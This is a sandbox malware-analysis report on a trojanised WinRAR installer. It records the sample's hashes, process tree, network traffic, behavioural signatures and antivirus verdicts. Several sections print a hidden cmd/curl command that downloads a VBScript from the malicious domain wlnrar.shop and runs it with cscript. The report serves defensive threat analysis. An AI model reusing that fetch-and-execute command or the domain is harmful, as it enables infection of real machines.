Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 13, 2024, 9:21 a.m.	Sept. 13, 2024, 9:27 a.m.

Size	4.7MB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`af91873c641aab500eba3a3ad6f17b74`
SHA256	`f568d5c96eefd67d284787b804ab17a610a93dcc48d855515fb187f1b6dba249`
CRC32	`7979E1E5`
ssdeep	`98304:rqwLdiOqeEadJ1VQ7zuRN8BOBfKHXSBSQdkd0cr/ylwD+/lZUdmkUH0Tn8VIRgQp:rqwLb8/3SSQdkCtwq/lSJU+0Iz6o`
PDB Path	D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE64 - (no description) Generic_Malware_Zero - Generic Malware UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

66e30a27e0efe_tmpD.exe "C:\Users\test22\AppData\Local\Temp\66e30a27e0efe_tmpD.exe"
1704
- winrar-info.exe "C:\Users\test22\AppData\Local\Temp\winrar-info.exe"
  2236
  - cmd.exe cmd.exe /c cd /d %temp% && del auto.vbs 2>nul && curl -o auto.vbs https://wlnrar.shop/download/auto.php && cscript auto.vbs
    2428
    - curl.exe curl -o auto.vbs https://wlnrar.shop/download/auto.php
      2484
- winrar-x64-701ru.exe "C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe"
  2284

Name	Response	Post-Analysis Lookup
wlnrar.shop	A 172.67.177.42 A 104.21.80.99	172.67.177.42

IP Address	Status	Action
104.21.80.99	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49166 -> 104.21.80.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49166 104.21.80.99:443	C=US, O=Google Trust Services, CN=WE1	CN=wlnrar.shop	c3:1e:19:20:23:a4:65:b7:fb:17:e6:2e:ea:ed:ba:88:88:97:78:7e

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 13, 2024, 9:14 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.didat
section	_RDATA

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

PNG

Starts servers listening (4 events)

Time & API	Arguments	Status	Return
bind Sept. 13, 2024, 9:14 a.m.	ip_address: 0.0.0.0 socket: 296 port: 0	1	0
bind Sept. 13, 2024, 9:14 a.m.	ip_address: 127.0.0.1 socket: 144 port: 0	1	0
listen Sept. 13, 2024, 9:14 a.m.	socket: 144 backlog: 1	1	0
accept Sept. 13, 2024, 9:14 a.m.	ip_address: socket: 144 port: 0	1	152

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST https://wlnrar.shop/json.php

Performs some HTTP requests (1 event)

request

POST https://wlnrar.shop/json.php

Sends data using the HTTP POST Method (1 event)

request

POST https://wlnrar.shop/json.php

Creates executable files on the filesystem (2 events)

file	C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe
file	C:\Users\test22\AppData\Local\Temp\winrar-info.exe

Creates a suspicious process (1 event)

cmdline

cmd.exe /c cd /d %temp% && del auto.vbs 2>nul && curl -o auto.vbs https://wlnrar.shop/download/auto.php && cscript auto.vbs

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Sept. 13, 2024, 9:14 a.m.	thread_identifier: 2432 thread_handle: 0x00000000000000d4 process_identifier: 2428 current_directory: filepath: track: 1 command_line: cmd.exe /c cd /d %temp% && del auto.vbs 2>nul && curl -o auto.vbs https://wlnrar.shop/download/auto.php && cscript auto.vbs filepath_r: stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x00000000000000d0	1	1	0

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Sept. 13, 2024, 9:14 a.m.	process_identifier: 2284 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 32 (PAGE_EXECUTE_READ) base_address: 0x000007fffff90000 process_handle: 0xffffffffffffffff	1	0	0

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

cmd.exe /c cd /d %temp% && del auto.vbs 2>nul && curl -o auto.vbs https://wlnrar.shop/download/auto.php && cscript auto.vbs

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\winrar-info.exe
file	C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Uses Sysinternals tools in order to add additional command line functionality (2 events)

cmdline	C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe
cmdline	"C:\Users\test22\AppData\Local\Temp\winrar-x64-701ru.exe"

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

192.168.56.103:49171

File has been identified by 38 AntiVirus engines on VirusTotal as malicious (38 events)

Bkav	W64.AIDetectMalware
Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (high confidence)
Cynet	Malicious (score: 100)
McAfee	Artemis!AF91873C641A
Cylance	Unsafe
VIPRE	Trojan.GenericKD.74038315
Sangfor	Trojan.Win64.Agent.V39d
BitDefender	Trojan.GenericKD.74038315
Arcabit	Trojan.Generic.D469BC2B
Symantec	Trojan.Gen.MBT
ESET-NOD32	Win64/Agent.ELP
APEX	Malicious
Avast	Win64:Evo-gen [Trj]
ClamAV	Win.Dropper.Nanocore-9986456-0
Kaspersky	UDS:DangerousObject.Multi.Generic
MicroWorld-eScan	Trojan.GenericKD.74038315
Rising	Trojan.Agent!8.B1E (CLOUD)
Emsisoft	Trojan.GenericKD.74038315 (B)
Zillya	Exploit.UAC.Win32.999
McAfeeD	ti!F568D5C96EEF
CTX	exe.trojan.generic
Sophos	Generic Reputation PUA (PUA)
FireEye	Trojan.GenericKD.74038315
Jiangmin	Worm.MSIL.vpw
Google	Detected
Microsoft	Trojan:Win32/Sabsik.FL.B!ml
ZoneAlarm	UDS:DangerousObject.Multi.Generic
GData	Trojan.GenericKD.74038315
DeepInstinct	MALICIOUS
Malwarebytes	Generic.Malware/Suspicious
Ikarus	Trojan.Win64.Agent
TrendMicro-HouseCall	Trojan.Win64.AMADEY.YXEILZ
Tencent	Win64.Trojan.Agent.Ncnw
AVG	Win64:Evo-gen [Trj]
Paloalto	generic.ml
CrowdStrike	win/malicious_confidence_70% (D)
alibabacloud	Trojan:Win/Caypnamer.A9nj

66e30a27e0efe_tmpD.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All